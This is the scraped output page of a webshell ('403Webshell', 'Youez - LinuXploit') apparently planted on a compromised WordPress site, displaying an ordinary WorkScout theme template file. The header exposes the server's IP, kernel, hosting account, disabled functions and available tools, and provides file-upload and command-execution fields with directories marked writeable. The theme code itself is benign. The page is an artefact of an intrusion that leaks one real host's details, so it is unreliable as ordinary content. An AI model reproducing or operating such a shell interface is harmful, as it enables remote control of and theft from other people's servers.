403Webshell

Warning: set_time_limit() has been disabled for security reasons in /home/domains/vol3/223/3261223/user/htdocs/wp-content/plugins/contact-form-7/wp-contact-form-7.php on line 26
Server IP : 77.68.64.20  /  Your IP : 216.73.216.231
Web Server : Apache
System : Linux hp3-wp-1011484.hostingp3.local 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
User : csh2668037 ( 2112352)
PHP Version : 7.4.33
Disable Function : shell_exec,exec,system,popen,set_time_limit
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/domains/vol3/223/3261223/user/htdocs/wp-content/themes/workscout/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/domains/vol3/223/3261223/user/htdocs/wp-content/themes/workscout/template-home.php
<?php
/**
 * Template Name: Page with Jobs Search
 *
 * @package WordPress
 * @subpackage workscout
 * @since workscout 1.0
 */
$header_old = Kirki::get_option('workscout','pp_old_header');
$header_type = (Kirki::get_option('workscout','pp_old_header') == true) ? 'old' : '' ;
$header_type = apply_filters('workscout_header_type',$header_type);
get_header($header_type); ?>
<?php $fancy_header = get_post_meta($post->ID, 'pp_transparent_header','true'); ?>



<!-- Intro Banner
================================================== -->
<div class="intro-banner dark-overlay" <?php echo workscout_get_new_search_header();?>>

    <!-- Transparent Header Spacer -->
    <div class="transparent-header-spacer"></div>
        <div class="container">
        
        <!-- Intro Headline -->
        <div class="row">
            <div class="sixteen columns">
                <div class="banner-headline-alt">
                    <h3>
                        <strong><?php echo Kirki::get_option( 'workscout','pp_jobs_home_title','Find Job');  ?></strong>
                        <span><?php echo Kirki::get_option( 'workscout','pp_jobs_home_subtitle','Hire experts or be hired in ');  ?>
                             <?php if(get_option('pp_jobs_home_typed_status','enable') == 'enable') { ?> <div class="typed-words"></div><?php } ?>
                         </span>
                    </h3>
                </div>
            </div>
        </div>
          
        <?php 
            $search_elements = Kirki::get_option( 'workscout', 'pp_job_search_elements',array('keywords','location')); 
            $el_nr = count($search_elements); 
        ?>
        <form method="GET"  class="workscout_main_search_form" action="<?php echo get_permalink(get_option('job_manager_jobs_page_id')); ?>">
        <!-- Search Bar -->
        <div class="row">
            <div class="sixteen columns  sc-jobs">
                <div class="intro-banner-search-form">
                    <?php if( apply_filters( 'workscout_template_home_job_intro_banner_search_form', true ) ): ?>
                        <?php if (in_array("keywords", $search_elements)) : ?>
                            <!-- Search Field -->
                            <div class="intro-search-field">
                                <label for ="intro-keywords" class="field-title ripple-effect"><?php esc_html_e('What job are you looking for?','workscout') ?></label>
                                <input id="intro-keywords" name="search_keywords" type="text" placeholder="<?php esc_attr_e( 'Job title, Skill, Industry', 'workscout' ); ?>">
                            </div>
                        <?php endif; ?>
                        
                        <?php if (in_array("location", $search_elements)) : ?>
                        <!-- Search Field -->
                            <div class="intro-search-field with-autocomplete">
                                <label for="search_location" class="field-title ripple-effect"><?php esc_html_e('Where?','workscout') ?></label>
                                <?php if ( class_exists('Astoundify_Job_Manager_Regions') && get_option( 'job_manager_regions_filter' ) || is_tax( 'job_listing_region' ) ) {  ?>
                                <?php
                                $dropdown = wp_dropdown_categories( array(
                                    'show_option_all'           => __( 'All Regions', 'workscout' ),
                                    'hierarchical'              => true,
                                    'orderby'                   => 'name',
                                    'taxonomy'                  => 'job_listing_region',
                                    'name'                      => 'search_region',
                                    'id'                        => 'search_location',
                                    'class'                     => 'search_region select-on-home job-manager-category-dropdown',
                                    'hide_empty'                => 1,
                                    'selected'                  => isset( $_GET[ 'search_region' ] ) ? $_GET[ 'search_region' ] : '',
                                    'echo'                      => false,
                                )  );
                                $fixed_dropdown = str_replace("&nbsp;", "", $dropdown); echo $fixed_dropdown;
                                } else { ?>
                                    <div class="input-with-icon location">
                                        <input id="search_location" name="search_location" type="text" placeholder="<?php esc_attr_e('City, State or Zip','workscout'); ?>">
                                        
                                        <a href="#"><i title="<?php esc_html_e('Find My Location','workscout') ?>" class="tooltip left la la-map-marked-alt"></i></a>
                                        <?php if(get_option('workscout_map_address_provider','osm') == 'osm') : ?><span class="type-and-hit-enter"><?php esc_html_e('type and hit enter','workscout') ?></span> <?php endif; ?>
                                    </div>
                                <?php } ?>
                               
                            </div>
                        <?php endif; ?>

                        
                        <?php if (in_array("category", $search_elements)) :   ?>
                        <!-- Search Field -->
                            <div class="intro-search-field">
                                <label for="categories" class="field-title ripple-effect"><?php esc_html_e('Categories','workscout') ?></label>
                                <?php 
                                
                         
                                    $html =  wp_dropdown_categories( 
                                        array(
                                            'taxonomy'          => 'job_listing_category',
                                            'name'              => 'search_category',
                                            'orderby'           => 'name',
                                            'class'             => 'select-on-home',
                                            'hierarchical'      => true,
                                            'hide_empty'        => true ,
                                            'show_option_all'   => esc_html__('All Categories','workscout'),
                                            'echo' => 0
                                            )
                                        );
                                    echo str_replace( '&nbsp;&nbsp;&nbsp;', '- ', $html );                   
                            ?>
                            </div>
                        <?php endif; ?>

                        <!-- Button -->
                        <div class="intro-search-button">
                            <button class="button ripple-effect">
                                <span><?php esc_html_e('Search','workscout') ?></span>
                                <i></i>
                            </button>
                        </div>
                    <?php endif; ?>   
                </div>
            </div>
        </div>
        </form>


        <!-- Stats -->
        <?php if(Kirki::get_option('workscout','pp_home_job_advanced')) {  ?>
        <div class="row">
            <div class="sixteen columns">
                <?php if( apply_filters( 'workscout_template_home_job_intro_banner_search_form_advanced', true ) ): ?>
                <div class="adv-search-btn">
                    <span><?php esc_html_e('Need more search options?','workscout') ?> </span>
                    <a href="<?php echo get_post_type_archive_link( 'job_listing' ) ?>"><?php esc_html_e('Advanced Search','workscout') ?> <i class="la la-long-arrow-alt-right"></i></a>
                </div>
                 <?php endif; ?>   
            </div>
        </div>
        <?php } ?>


    </div>
</div>

<?php
while ( have_posts() ) : the_post(); ?>
<!-- 960 Container -->
<div class="container page-container home-page-container">
    <article <?php post_class("sixteen columns"); ?>>
                <?php the_content(); ?>
    </article>
</div>
<?php endwhile; // end of the loop.

get_footer(); ?>

Youez - 2016 - github.com/yon3zu
LinuXploit